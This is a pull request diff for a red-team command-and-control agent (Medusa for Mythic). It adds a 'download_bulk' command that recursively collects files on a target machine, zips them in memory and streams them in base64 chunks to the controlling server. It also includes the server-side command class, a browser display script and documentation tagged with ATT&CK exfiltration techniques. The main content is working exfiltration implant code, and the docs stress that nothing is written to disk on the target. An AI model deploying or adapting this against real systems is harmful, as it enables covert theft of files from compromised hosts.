### PR TITLE
Add download_bulk for multi-file/archive downloads

### DIFF
--- a/Payload_Type/medusa/medusa/agent_code/download_bulk.py
+++ b/Payload_Type/medusa/medusa/agent_code/download_bulk.py
@@ -17,36 +17,56 @@
                 file_list = []
                 archive_base_dir = None
 
-                # Check if path is a JSON list of files
+                # Check if path is a list of files/directories
                 if isinstance(path, list):
-                    # Normalise each path in the list to absolute
-                    file_list = [
-                        f if os.path.isabs(f) else os.path.join(self.current_directory, f)
-                        for f in path
-                    ]
+                    for p in path:
+                        abs_p = p if os.path.isabs(p) else os.path.join(self.current_directory, p)
+                        if os.path.isdir(abs_p):
+                            for root, dirs, files in os.walk(abs_p):
+                                for fname in files:
+                                    file_list.append(os.path.join(root, fname))
+                        else:
+                            file_list.append(abs_p)
                     # Anchor arcnames at the filesystem root so each entry's full path is
                     # preserved inside the archive (e.g. "etc/nginx/nginx.conf").
                     archive_base_dir = os.sep
-                else:
-                    # Normalise to absolute path
-                    abs_path = path if os.path.isabs(path) \
-                        else os.path.join(self.current_directory, path)
-
-                    if os.path.isdir(abs_path):
-                        # Walk the directory and collect all files.
-                        # Anchor at the parent so the directory name itself appears in the
-                        # archive (e.g. specifying /etc/nginx gives nginx/nginx.conf inside
-                        # the zip rather than stripping the top-level name).
-                        archive_base_dir = os.path.dirname(abs_path)
-                        for root, dirs, files in os.walk(abs_path):
-                            for fname in files:
-                                file_list.append(os.path.join(root, fname))
-                    elif os.path.isfile(abs_path):
-                        # Single file: preserve just the filename, no leading path.
-                        archive_base_dir = os.path.dirname(abs_path)
-                        file_list = [abs_path]
+                elif isinstance(path, str):
+                    # Try to parse a JSON list from a string (backward compat)
+                    stripped = path.strip()
+                    if stripped.startswith("["):
+                        try:
+                            parsed = json.loads(stripped)
+                            if isinstance(parsed, list):
+                                for f in parsed:
+                                    abs_f = f if os.path.isabs(f) else os.path.join(self.current_directory, f)
+                                    if os.path.isdir(abs_f):
+                                        for root, dirs, files in os.walk(abs_f):
+                                            for fname in files:
+                                                file_list.append(os.path.join(root, fname))
+                                    else:
+                                        file_list.append(abs_f)
+                                archive_base_dir = os.sep
+                            else:
+                                return "Invalid path value: {}".format(path)
+                        except Exception as e:
+                            return "Failed to parse path as JSON list: {} - {}".format(path, e)
                     else:
-                        return "Path does not exist or is not accessible: {}".format(abs_path)
+                        # Normalise to absolute path
+                        abs_path = path if os.path.isabs(path) \
+                            else os.path.join(self.current_directory, path)
+
+                        if os.path.isdir(abs_path):
+                            archive_base_dir = os.path.dirname(abs_path)
+                            for root, dirs, files in os.walk(abs_path):
+                                for fname in files:
+                                    file_list.append(os.path.join(root, fname))
+                        elif os.path.isfile(abs_path):
+                            archive_base_dir = os.path.dirname(abs_path)
+                            file_list = [abs_path]
+                        else:
+                            return "Path does not exist or is not accessible: {}".format(abs_path)
+                else:
+                    return "Invalid path argument type: {}".format(type(path))
 
                 if not file_list:
                     return "No files found to download."

--- a/Payload_Type/medusa/medusa/agent_code/download_bulk.py
+++ b/Payload_Type/medusa/medusa/agent_code/download_bulk.py
@@ -1,0 +1,177 @@
+        def download_bulk(self, task_id, path, mode="archive"):
+                """
+                Bulk download files or a directory from the target machine.
+
+                Args:
+                    task_id: The task identifier for this operation.
+                    path: A file path, directory path, or JSON list of file paths (absolute paths).
+                    mode: "iterative" to send files one by one, or "archive" to bundle into
+                          an in-memory zip and send as a single file (default: "archive").
+                """
+                import zipfile
+                import io
+
+                # Resolve the list of files to download.
+                # archive_base_dir is used in archive mode to compute relative arcnames that
+                # preserve the original directory structure inside the zip.
+                file_list = []
+                archive_base_dir = None
+
+                # Check if path is a JSON list of files
+                if isinstance(path, list):
+                    # Normalise each path in the list to absolute
+                    file_list = [
+                        f if os.path.isabs(f) else os.path.join(self.current_directory, f)
+                        for f in path
+                    ]
+                    # Anchor arcnames at the filesystem root so each entry's full path is
+                    # preserved inside the archive (e.g. "etc/nginx/nginx.conf").
+                    archive_base_dir = os.sep
+                else:
+                    # Normalise to absolute path
+                    abs_path = path if os.path.isabs(path) \
+                        else os.path.join(self.current_directory, path)
+
+                    if os.path.isdir(abs_path):
+                        # Walk the directory and collect all files.
+                        # Anchor at the parent so the directory name itself appears in the
+                        # archive (e.g. specifying /etc/nginx gives nginx/nginx.conf inside
+                        # the zip rather than stripping the top-level name).
+                        archive_base_dir = os.path.dirname(abs_path)
+                        for root, dirs, files in os.walk(abs_path):
+                            for fname in files:
+                                file_list.append(os.path.join(root, fname))
+                    elif os.path.isfile(abs_path):
+                        # Single file: preserve just the filename, no leading path.
+                        archive_base_dir = os.path.dirname(abs_path)
+                        file_list = [abs_path]
+                    else:
+                        return "Path does not exist or is not accessible: {}".format(abs_path)
+
+                if not file_list:
+                    return "No files found to download."
+
+                # Cache the task reference once to avoid repeated O(n) lookups inside loops
+                task_ref = [task for task in self.taskings if task["task_id"] == task_id][0]
+
+                results = []
+
+                if mode == "iterative":
+                    # Download each file individually using the same chunked approach as download()
+                    for file_path in file_list:
+                        if task_ref["stopped"]:
+                            return "Job stopped."
+
+                        if not os.path.isfile(file_path):
+                            results.append("Skipped (not a file): {}".format(file_path))
+                            continue
+
+                        file_size = os.stat(file_path).st_size
+                        total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)
+
+                        data = {
+                            "action": "post_response",
+                            "responses": [{
+                                "task_id": task_id,
+                                "download": {
+                                    "total_chunks": total_chunks,
+                                    "full_path": file_path,
+                                    "chunk_size": CHUNK_SIZE
+                                }
+                            }]
+                        }
+                        initial_response = self.postMessageAndRetrieveResponse(data)
+                        file_id = initial_response["responses"][0]["file_id"]
+                        chunk_num = 1
+
+                        with open(file_path, 'rb') as f:
+                            while True:
+                                if task_ref["stopped"]:
+                                    return "Job stopped."
+
+                                content = f.read(CHUNK_SIZE)
+                                if not content:
+                                    break
+
+                                data = {
+                                    "action": "post_response",
+                                    "responses": [{
+                                        "task_id": task_id,
+                                        "download": {
+                                            "chunk_num": chunk_num,
+                                            "file_id": file_id,
+                                            "chunk_data": base64.b64encode(content).decode()
+                                        }
+                                    }]
+                                }
+                                chunk_num += 1
+                                self.postMessageAndRetrieveResponse(data)
+
+                        results.append(json.dumps({"agent_file_id": file_id, "file_path": file_path}))
+
+                    return "\n".join(results)
+
+                else:
+                    # Archive mode: build an in-memory zip and send it as a single file.
+                    # Directory structure is preserved inside the archive using arcnames
+                    # computed relative to archive_base_dir.
+                    zip_buffer = io.BytesIO()
+                    with zipfile.ZipFile(zip_buffer, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
+                        for file_path in file_list:
+                            if task_ref["stopped"]:
+                                return "Job stopped."
+
+                            if not os.path.isfile(file_path):
+                                continue
+
+                            # Preserve the original directory structure: compute the path
+                            # relative to archive_base_dir so that sub-directories appear as
+                            # real zip entries (e.g. nginx/conf.d/default.conf) rather than
+                            # flat names with underscores.
+                            arcname = os.path.relpath(file_path, archive_base_dir)
+                            zf.write(file_path, arcname)
+
+                    zip_data = zip_buffer.getvalue()
+                    zip_buffer.close()
+
+                    archive_name = "download_bulk_{}.zip".format(task_id)
+                    total_chunks = int(len(zip_data) / CHUNK_SIZE) + (len(zip_data) % CHUNK_SIZE > 0)
+
+                    data = {
+                        "action": "post_response",
+                        "responses": [{
+                            "task_id": task_id,
+                            "download": {
+                                "total_chunks": total_chunks,
+                                "full_path": archive_name,
+                                "chunk_size": CHUNK_SIZE
+                            }
+                        }]
+                    }
+                    initial_response = self.postMessageAndRetrieveResponse(data)
+                    file_id = initial_response["responses"][0]["file_id"]
+                    chunk_num = 1
+                    offset = 0
+
+                    while offset < len(zip_data):
+                        if task_ref["stopped"]:
+                            return "Job stopped."
+
+                        chunk = zip_data[offset:offset + CHUNK_SIZE]
+                        data = {
+                            "action": "post_response",
+                            "responses": [{
+                                "task_id": task_id,
+                                "download": {
+                                    "chunk_num": chunk_num,
+                                    "file_id": file_id,
+                                    "chunk_data": base64.b64encode(chunk).decode()
+                                }
+                            }]
+                        }
+                        chunk_num += 1
+                        offset += CHUNK_SIZE
+                        self.postMessageAndRetrieveResponse(data)
+
+                    return json.dumps({"agent_file_id": file_id})
+

--- a/Payload_Type/medusa/medusa/agent_code/download_bulk.py
+++ b/Payload_Type/medusa/medusa/agent_code/download_bulk.py
@@ -1,161 +1,93 @@
-        def download_bulk(self, task_id, path, mode="archive"):
-                """
-                Bulk download files or a directory from the target machine.
+    def download_bulk(self, task_id, path, mode="archive"):
+            """
+            Bulk download files or a directory from the target machine.
 
-                Args:
-                    task_id: The task identifier for this operation.
-                    path: A file path, directory path, or JSON list of file paths (absolute paths).
-                    mode: "iterative" to send files one by one, or "archive" to bundle into
-                          an in-memory zip and send as a single file (default: "archive").
-                """
-                import zipfile
-                import io
+            Args:
+                task_id: The task identifier for this operation.
+                path: A file path, directory path, or JSON list of file paths (absolute paths).
+                mode: "iterative" to send files one by one, or "archive" to bundle into
+                      an in-memory zip and send as a single file (default: "archive").
+            """
+            import zipfile
+            import io
 
-                # Resolve the list of files to download.
-                # archive_base_dir is used in archive mode to compute relative arcnames that
-                # preserve the original directory structure inside the zip.
-                file_list = []
-                archive_base_dir = None
+            # Resolve the list of files to download.
+            # archive_base_dir is used in archive mode to compute relative arcnames that
+            # preserve the original directory structure inside the zip.
+            file_list = []
+            archive_base_dir = None
 
-                # Check if path is a list of files/directories
-                if isinstance(path, list):
-                    for p in path:
-                        abs_p = p if os.path.isabs(p) else os.path.join(self.current_directory, p)
-                        if os.path.isdir(abs_p):
-                            for root, dirs, files in os.walk(abs_p):
-                                for fname in files:
-                                    file_list.append(os.path.join(root, fname))
-                        else:
-                            file_list.append(abs_p)
-                    # Anchor arcnames at the filesystem root so each entry's full path is
-                    # preserved inside the archive (e.g. "etc/nginx/nginx.conf").
-                    archive_base_dir = os.sep
-                elif isinstance(path, str):
-                    # Try to parse a JSON list from a string (backward compat)
-                    stripped = path.strip()
-                    if stripped.startswith("["):
-                        try:
-                            parsed = json.loads(stripped)
-                            if isinstance(parsed, list):
-                                for f in parsed:
-                                    abs_f = f if os.path.isabs(f) else os.path.join(self.current_directory, f)
-                                    if os.path.isdir(abs_f):
-                                        for root, dirs, files in os.walk(abs_f):
-                                            for fname in files:
-                                                file_list.append(os.path.join(root, fname))
-                                    else:
-                                        file_list.append(abs_f)
-                                archive_base_dir = os.sep
-                            else:
-                                return "Invalid path value: {}".format(path)
-                        except Exception as e:
-                            return "Failed to parse path as JSON list: {} - {}".format(path, e)
+            # Check if path is a list of files/directories
+            if isinstance(path, list):
+                for p in path:
+                    abs_p = p if os.path.isabs(p) else os.path.join(self.current_directory, p)
+                    if os.path.isdir(abs_p):
+                        for root, dirs, files in os.walk(abs_p):
+                            for fname in files:
+                                file_list.append(os.path.join(root, fname))
                     else:
-                        # Normalise to absolute path
-                        abs_path = path if os.path.isabs(path) \
-                            else os.path.join(self.current_directory, path)
-
-                        if os.path.isdir(abs_path):
-                            archive_base_dir = os.path.dirname(abs_path)
-                            for root, dirs, files in os.walk(abs_path):
-                                for fname in files:
-                                    file_list.append(os.path.join(root, fname))
-                        elif os.path.isfile(abs_path):
-                            archive_base_dir = os.path.dirname(abs_path)
-                            file_list = [abs_path]
+                        file_list.append(abs_p)
+                # Anchor arcnames at the filesystem root so each entry's full path is
+                # preserved inside the archive (e.g. "etc/nginx/nginx.conf").
+                archive_base_dir = os.sep
+            elif isinstance(path, str):
+                # Try to parse a JSON list from a string (backward compat)
+                stripped = path.strip()
+                if stripped.startswith("["):
+                    try:
+                        parsed = json.loads(stripped)
+                        if isinstance(parsed, list):
+                            for f in parsed:
+                                abs_f = f if os.path.isabs(f) else os.path.join(self.current_directory, f)
+                                if os.path.isdir(abs_f):
+                                    for root, dirs, files in os.walk(abs_f):
+                                        for fname in files:
+                                            file_list.append(os.path.join(root, fname))
+                                else:
+                                    file_list.append(abs_f)
+                            archive_base_dir = os.sep
                         else:
-                            return "Path does not exist or is not accessible: {}".format(abs_path)
+                            return "Invalid path value: {}".format(path)
+                    except Exception as e:
+                        return "Failed to parse path as JSON list: {} - {}".format(path, e)
                 else:
-                    return "Invalid path argument type: {}".format(type(path))
+                    # Normalise to absolute path
+                    abs_path = path if os.path.isabs(path) \
+                        else os.path.join(self.current_directory, path)
 
-                if not file_list:
-                    return "No files found to download."
+                    if os.path.isdir(abs_path):
+                        archive_base_dir = os.path.dirname(abs_path)
+                        for root, dirs, files in os.walk(abs_path):
+                            for fname in files:
+                                file_list.append(os.path.join(root, fname))
+                    elif os.path.isfile(abs_path):
+                        archive_base_dir = os.path.dirname(abs_path)
+                        file_list = [abs_path]
+                    else:
+                        return "Path does not exist or is not accessible: {}".format(abs_path)
+            else:
+                return "Invalid path argument type: {}".format(type(path))
 
-                # Cache the task reference once to avoid repeated O(n) lookups inside loops
-                task_ref = [task for task in self.taskings if task["task_id"] == task_id][0]
+            if not file_list:
+                return "No files found to download."
 
-                results = []
+            # Cache the task reference once to avoid repeated O(n) lookups inside loops
+            task_ref = [task for task in self.taskings if task["task_id"] == task_id][0]
 
-                if mode == "iterative":
-                    # Download each file individually using the same chunked approach as download()
-                    for file_path in file_list:
-                        if task_ref["stopped"]:
-                            return "Job stopped."
+            results = []
 
-                        if not os.path.isfile(file_path):
-                            results.append("Skipped (not a file): {}".format(file_path))
-                            continue
+            if mode == "iterative":
+                # Download each file individually using the same chunked approach as download()
+                for file_path in file_list:
+                    if task_ref["stopped"]:
+                        return "Job stopped."
 
-                        file_size = os.stat(file_path).st_size
-                        total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)
+                    if not os.path.isfile(file_path):
+                        results.append("Skipped (not a file): {}".format(file_path))
+                        continue
 
-                        data = {
-                            "action": "post_response",
-                            "responses": [{
-                                "task_id": task_id,
-                                "download": {
-                                    "total_chunks": total_chunks,
-                                    "full_path": file_path,
-                                    "chunk_size": CHUNK_SIZE
-                                }
-                            }]
-                        }
-                        initial_response = self.postMessageAndRetrieveResponse(data)
-                        file_id = initial_response["responses"][0]["file_id"]
-                        chunk_num = 1
-
-                        with open(file_path, 'rb') as f:
-                            while True:
-                                if task_ref["stopped"]:
-                                    return "Job stopped."
-
-                                content = f.read(CHUNK_SIZE)
-                                if not content:
-                                    break
-
-                                data = {
-                                    "action": "post_response",
-                                    "responses": [{
-                                        "task_id": task_id,
-                                        "download": {
-                                            "chunk_num": chunk_num,
-                                            "file_id": file_id,
-                                            "chunk_data": base64.b64encode(content).decode()
-                                        }
-                                    }]
-                                }
-                                chunk_num += 1
-                                self.postMessageAndRetrieveResponse(data)
-
-                        results.append(json.dumps({"agent_file_id": file_id, "file_path": file_path}))
-
-                    return "\n".join(results)
-
-                else:
-                    # Archive mode: build an in-memory zip and send it as a single file.
-                    # Directory structure is preserved inside the archive using arcnames
-                    # computed relative to archive_base_dir.
-                    zip_buffer = io.BytesIO()
-                    with zipfile.ZipFile(zip_buffer, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
-                        for file_path in file_list:
-                            if task_ref["stopped"]:
-                                return "Job stopped."
-
-                            if not os.path.isfile(file_path):
-                                continue
-
-                            # Preserve the original directory structure: compute the path
-                            # relative to archive_base_dir so that sub-directories appear as
-                            # real zip entries (e.g. nginx/conf.d/default.conf) rather than
-                            # flat names with underscores.
-                            arcname = os.path.relpath(file_path, archive_base_dir)
-                            zf.write(file_path, arcname)
-
-                    zip_data = zip_buffer.getvalue()
-                    zip_buffer.close()
-
-                    archive_name = "download_bulk_{}.zip".format(task_id)
-                    total_chunks = int(len(zip_data) / CHUNK_SIZE) + (len(zip_data) % CHUNK_SIZE > 0)
+                    file_size = os.stat(file_path).st_size
+                    total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)
 
                     data = {
                         "action": "post_response",
@@ -163,7 +95,7 @@
                             "task_id": task_id,
                             "download": {
                                 "total_chunks": total_chunks,
-                                "full_path": archive_name,
+                                "full_path": file_path,
                                 "chunk_size": CHUNK_SIZE
                             }
                         }]
@@ -171,27 +103,94 @@
                     initial_response = self.postMessageAndRetrieveResponse(data)
                     file_id = initial_response["responses"][0]["file_id"]
                     chunk_num = 1
-                    offset = 0
 
-                    while offset < len(zip_data):
+                    with open(file_path, 'rb') as f:
+                        while True:
+                            if task_ref["stopped"]:
+                                return "Job stopped."
+
+                            content = f.read(CHUNK_SIZE)
+                            if not content:
+                                break
+
+                            data = {
+                                "action": "post_response",
+                                "responses": [{
+                                    "task_id": task_id,
+                                    "download": {
+                                        "chunk_num": chunk_num,
+                                        "file_id": file_id,
+                                        "chunk_data": base64.b64encode(content).decode()
+                                    }
+                                }]
+                            }
+                            chunk_num += 1
+                            self.postMessageAndRetrieveResponse(data)
+
+                    results.append(json.dumps({"agent_file_id": file_id, "file_path": file_path}))
+
+                return "\n".join(results)
+
+            else:
+                # Archive mode: build an in-memory zip and send it as a single file.
+                # Directory structure is preserved inside the archive using arcnames
+                # computed relative to archive_base_dir.
+                zip_buffer = io.BytesIO()
+                with zipfile.ZipFile(zip_buffer, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
+                    for file_path in file_list:
                         if task_ref["stopped"]:
                             return "Job stopped."
 
-                        chunk = zip_data[offset:offset + CHUNK_SIZE]
-                        data = {
-                            "action": "post_response",
-                            "responses": [{
-                                "task_id": task_id,
-                                "download": {
-                                    "chunk_num": chunk_num,
-                                    "file_id": file_id,
-                                    "chunk_data": base64.b64encode(chunk).decode()
-                                }
-                            }]
+                        if not os.path.isfile(file_path):
+                            continue
+
+                        # Preserve the original directory structure: compute the path
+                        # relative to archive_base_dir so that sub-directories appear as
+                        # real zip entries (e.g. nginx/conf.d/default.conf) rather than
+                        # flat names with underscores.
+                        arcname = os.path.relpath(file_path, archive_base_dir)
+                        zf.write(file_path, arcname)
+
+                zip_data = zip_buffer.getvalue()
+                zip_buffer.close()
+
+                archive_name = "download_bulk_{}.zip".format(task_id)
+                total_chunks = int(len(zip_data) / CHUNK_SIZE) + (len(zip_data) % CHUNK_SIZE > 0)
+
+                data = {
+                    "action": "post_response",
+                    "responses": [{
+                        "task_id": task_id,
+                        "download": {
+                            "total_chunks": total_chunks,
+                            "full_path": archive_name,
+                            "chunk_size": CHUNK_SIZE
                         }
-                        chunk_num += 1
-                        offset += CHUNK_SIZE
-                        self.postMessageAndRetrieveResponse(data)
+                    }]
+                }
+                initial_response = self.postMessageAndRetrieveResponse(data)
+                file_id = initial_response["responses"][0]["file_id"]
+                chunk_num = 1
+                offset = 0
 
-                    return json.dumps({"agent_file_id": file_id})
+                while offset < len(zip_data):
+                    if task_ref["stopped"]:
+                        return "Job stopped."
 
+                    chunk = zip_data[offset:offset + CHUNK_SIZE]
+                    data = {
+                        "action": "post_response",
+                        "responses": [{
+                            "task_id": task_id,
+                            "download": {
+                                "chunk_num": chunk_num,
+                                "file_id": file_id,
+                                "chunk_data": base64.b64encode(chunk).decode()
+                            }
+                        }]
+                    }
+                    chunk_num += 1
+                    offset += CHUNK_SIZE
+                    self.postMessageAndRetrieveResponse(data)
+
+                return json.dumps({"agent_file_id": file_id})

--- a/Payload_Type/medusa/medusa/mythic/agent_functions/download_bulk.py
+++ b/Payload_Type/medusa/medusa/mythic/agent_functions/download_bulk.py
@@ -9,8 +9,9 @@ class DownloadBulkArguments(TaskArguments):
         self.args = [
             CommandParameter(
                 name="path",
-                type=ParameterType.String,
-                description="Path to a file, a directory, or a JSON list of absolute file paths to download.",
+                type=ParameterType.Array,
+                default_value=[],
+                description="Paths of file(s) or director(ies) to download.",
                 parameter_group_info=[ParameterGroupInfo(
                     required=True
                 )]
@@ -38,21 +39,24 @@ class DownloadBulkArguments(TaskArguments):
 
         if self.command_line[0] == "{":
             temp_json = json.loads(self.command_line)
+            if "path" in temp_json:
+                path_val = temp_json["path"]
+                if isinstance(path_val, str):
+                    temp_json["path"] = [path_val]
             self.load_args_from_dictionary(temp_json)
         else:
-            # Strip surrounding quotes if present
             raw = self.command_line
             if (raw[0] == '"' and raw[-1] == '"') or (raw[0] == "'" and raw[-1] == "'"):
                 raw = raw[1:-1]
-            self.args[0].value = raw
+            self.add_arg("path", [raw])
 
 
 class DownloadBulkCommand(CommandBase):
     cmd = "download_bulk"
     needs_admin = False
-    help_cmd = 'download_bulk {"path": "/remote/path", "mode": "archive"}'
+    help_cmd = 'download_bulk {"path": ["/remote/path", "/remote/path2"], "mode": "archive"}'
     description = (
-        "Bulk download a file, directory, or list of files from the target machine. "
+        "Bulk download file(s), director(ies), or a mix from the target machine. "
         "Use 'archive' mode to bundle everything into a single in-memory zip, "
         "or 'iterative' mode to transfer each file individually."
     )
@@ -73,9 +77,10 @@ class DownloadBulkCommand(CommandBase):
             TaskID=taskData.Task.ID,
             Success=True,
         )
-        path = taskData.args.get_arg("path")
+        paths = taskData.args.get_arg("path")
         mode = taskData.args.get_arg("mode") or "archive"
-        response.DisplayParams = f"{path} (mode: {mode})"
+        display = ", ".join(paths) if isinstance(paths, list) else str(paths)
+        response.DisplayParams = f"{display} (mode: {mode})"
         return response
 
     async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:

--- a/Payload_Type/medusa/medusa/mythic/agent_functions/download_bulk.py
+++ b/Payload_Type/medusa/medusa/mythic/agent_functions/download_bulk.py
@@ -1,0 +1,83 @@
+from mythic_container.MythicCommandBase import *
+import json
+from mythic_container.MythicRPC import *
+
+
+class DownloadBulkArguments(TaskArguments):
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
+        self.args = [
+            CommandParameter(
+                name="path",
+                type=ParameterType.String,
+                description="Path to a file, a directory, or a JSON list of absolute file paths to download.",
+                parameter_group_info=[ParameterGroupInfo(
+                    required=True
+                )]
+            ),
+            CommandParameter(
+                name="mode",
+                type=ParameterType.ChooseOne,
+                choices=["archive", "iterative"],
+                default_value="archive",
+                description=(
+                    "Download mode: 'archive' bundles all files into a single in-memory zip archive, "
+                    "'iterative' sends each file individually."
+                ),
+                parameter_group_info=[ParameterGroupInfo(
+                    required=False
+                )]
+            ),
+        ]
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise Exception(
+                "Require a path to download.\n\tUsage: {}".format(DownloadBulkCommand.help_cmd)
+            )
+
+        if self.command_line[0] == "{":
+            temp_json = json.loads(self.command_line)
+            self.load_args_from_dictionary(temp_json)
+        else:
+            # Strip surrounding quotes if present
+            raw = self.command_line
+            if (raw[0] == '"' and raw[-1] == '"') or (raw[0] == "'" and raw[-1] == "'"):
+                raw = raw[1:-1]
+            self.args[0].value = raw
+
+
+class DownloadBulkCommand(CommandBase):
+    cmd = "download_bulk"
+    needs_admin = False
+    help_cmd = 'download_bulk {"path": "/remote/path", "mode": "archive"}'
+    description = (
+        "Bulk download a file, directory, or list of files from the target machine. "
+        "Use 'archive' mode to bundle everything into a single in-memory zip, "
+        "or 'iterative' mode to transfer each file individually."
+    )
+    version = 1
+    is_download_file = True
+    author = "@maclarel"
+    parameters = []
+    attackmapping = ["T1020", "T1030", "T1041"]
+    argument_class = DownloadBulkArguments
+    browser_script = BrowserScript(script_name="download_bulk", author="@maclarel", for_new_ui=True)
+    attributes = CommandAttributes(
+        supported_python_versions=["Python 2.7", "Python 3.8"],
+        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
+    )
+
+    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:
+        response = PTTaskCreateTaskingMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+        )
+        path = taskData.args.get_arg("path")
+        mode = taskData.args.get_arg("mode") or "archive"
+        response.DisplayParams = f"{path} (mode: {mode})"
+        return response
+
+    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
+        return resp

--- a/Payload_Type/medusa/medusa/mythic/browser_scripts/download_bulk.js
+++ b/Payload_Type/medusa/medusa/mythic/browser_scripts/download_bulk.js
@@ -1,0 +1,57 @@
+function(task, responses){
+    if(task.status.includes("error")){
+        const combined = responses.reduce( (prev, cur) => {
+            return prev + cur;
+        }, "");
+        return {'plaintext': combined};
+    } else if(task.completed){
+        if(responses.length === 0){
+            return {'plaintext': 'No response from agent.'};
+        }
+        // Iterative mode returns one JSON object per file, one per line.
+        // Archive mode returns a single JSON object with agent_file_id.
+        const lines = responses[0].split('\n').filter(l => l.trim().length > 0);
+        let downloads = [];
+        let plainLines = [];
+        for(let i = 0; i < lines.length; i++){
+            try{
+                let data = JSON.parse(lines[i].replace((new RegExp("'", 'g')), '"'));
+                if("agent_file_id" in data){
+                    let label = "file_path" in data
+                        ? "Download " + data["file_path"]
+                        : "Download " + task["display_params"];
+                    downloads.push({
+                        "agent_file_id": data["agent_file_id"],
+                        "variant": "contained",
+                        "name": label
+                    });
+                } else {
+                    plainLines.push(lines[i]);
+                }
+            } catch(error){
+                plainLines.push(lines[i]);
+            }
+        }
+        if(downloads.length > 0){
+            let result = {"download": downloads};
+            if(plainLines.length > 0){
+                result["plaintext"] = plainLines.join('\n');
+            }
+            return result;
+        }
+        return {'plaintext': responses[0]};
+    } else if(task.status === "processed"){
+        if(responses.length > 0){
+            try{
+                const task_data = JSON.parse(responses[0]);
+                if("total_chunks" in task_data){
+                    return {"plaintext": "Downloading with " + task_data["total_chunks"] + " total chunks..."};
+                }
+            } catch(error){}
+            return {"plaintext": responses[0]};
+        }
+        return {"plaintext": "No data yet..."};
+    } else {
+        return {"plaintext": "No response yet from agent..."};
+    }
+}

--- a/documentation-payload/medusa/commands/download_bulk.md
+++ b/documentation-payload/medusa/commands/download_bulk.md
@@ -7,14 +7,14 @@ hidden = false
 
 ## Summary
 
-Bulk download a file, directory, or list of files from the target machine.
+Bulk download file(s), director(ies), or a mix from the target machine.
 
 Two modes are supported:
 
 - **archive** *(default)*: all files are bundled into a single in-memory zip archive that is streamed back to the Mythic server. The archive is never written to disk on the target.
 - **iterative**: each file is transferred individually using the same chunked approach as the `download` command.
 
-The command automatically detects whether the supplied path is a single file or a directory. When a directory is specified, all files within it (recursively) are included.
+The command automatically detects whether each supplied path is a file or a directory. When a directory is specified, all files within it (recursively) are included. Files that do not exist or are not accessible are skipped rather than causing the entire task to fail.
 
 - Python Versions Supported: 2.7, 3.8
 - Needs Admin: False
@@ -25,7 +25,7 @@ The command automatically detects whether the supplied path is a single file or 
 
 #### path
 
-- Description: Path to a file, a directory, or a JSON list of absolute file paths to download.
+- Description: An array of file or directory paths to download. Multiple entries can be added through the Mythic UI or provided as a JSON array.
 - Required Value: True
 - Default Value: None
 
@@ -40,13 +40,13 @@ The command automatically detects whether the supplied path is a single file or 
 Download an entire directory as a zip archive (default mode):
 
 ```
-download_bulk {"path": "/remote/directory", "mode": "archive"}
+download_bulk {"path": ["/remote/directory"], "mode": "archive"}
 ```
 
 Download a single file using archive mode:
 
 ```
-download_bulk {"path": "/remote/path/to/file.txt"}
+download_bulk {"path": ["/remote/path/to/file.txt"]}
 ```
 
 Download multiple specific files iteratively:
@@ -58,7 +58,7 @@ download_bulk {"path": ["/remote/file1.txt", "/remote/file2.txt"], "mode": "iter
 Download a directory, sending each file individually:
 
 ```
-download_bulk {"path": "/remote/directory", "mode": "iterative"}
+download_bulk {"path": ["/remote/directory"], "mode": "iterative"}
 ```
 
 ## MITRE ATT&CK Mapping
@@ -73,11 +73,11 @@ The `download_bulk` function extends the single-file `download` capability to su
 
 ### Path detection
 
-The `path` argument is resolved using `os.path.isdir` and `os.path.isfile`. Relative paths are resolved against the agent's current working directory:
+The `path` argument accepts an array of paths. Each entry is resolved using `os.path.isdir` and `os.path.isfile`. Relative paths are resolved against the agent's current working directory:
 
 - **Directory** – the directory tree is walked with `os.walk`; every file found is added to the transfer list.
-- **File** – treated as a single-item list.
-- **JSON list** – an explicit list of absolute file paths can be provided directly.
+- **File** – added directly to the transfer list.
+- **Non-existent** – skipped with a warning message; the task continues with remaining files.
 
 ### Archive mode
 
@@ -99,7 +99,7 @@ Each file is transferred individually in the same chunked manner as the existing
     def download_bulk(self, task_id, path, mode="archive"):
         import zipfile, io
 
-        # Build file list from path (file, directory, or list)
+        # Build file list from path array (files, directories, or mix)
         ...
 
         if mode == "iterative":

--- a/documentation-payload/medusa/commands/download_bulk.md
+++ b/documentation-payload/medusa/commands/download_bulk.md
@@ -1,0 +1,117 @@
++++
+title = "download_bulk"
+chapter = false
+weight = 100
+hidden = false
++++
+
+## Summary
+
+Bulk download a file, directory, or list of files from the target machine.
+
+Two modes are supported:
+
+- **archive** *(default)*: all files are bundled into a single in-memory zip archive that is streamed back to the Mythic server. The archive is never written to disk on the target.
+- **iterative**: each file is transferred individually using the same chunked approach as the `download` command.
+
+The command automatically detects whether the supplied path is a single file or a directory. When a directory is specified, all files within it (recursively) are included.
+
+- Python Versions Supported: 2.7, 3.8
+- Needs Admin: False
+- Version: 1
+- Author: @maclarel
+
+### Arguments
+
+#### path
+
+- Description: Path to a file, a directory, or a JSON list of absolute file paths to download.
+- Required Value: True
+- Default Value: None
+
+#### mode
+
+- Description: `archive` (default) to bundle everything into a single in-memory zip, or `iterative` to transfer each file individually.
+- Required Value: False
+- Default Value: `archive`
+
+## Usage
+
+Download an entire directory as a zip archive (default mode):
+
+```
+download_bulk {"path": "/remote/directory", "mode": "archive"}
+```
+
+Download a single file using archive mode:
+
+```
+download_bulk {"path": "/remote/path/to/file.txt"}
+```
+
+Download multiple specific files iteratively:
+
+```
+download_bulk {"path": ["/remote/file1.txt", "/remote/file2.txt"], "mode": "iterative"}
+```
+
+Download a directory, sending each file individually:
+
+```
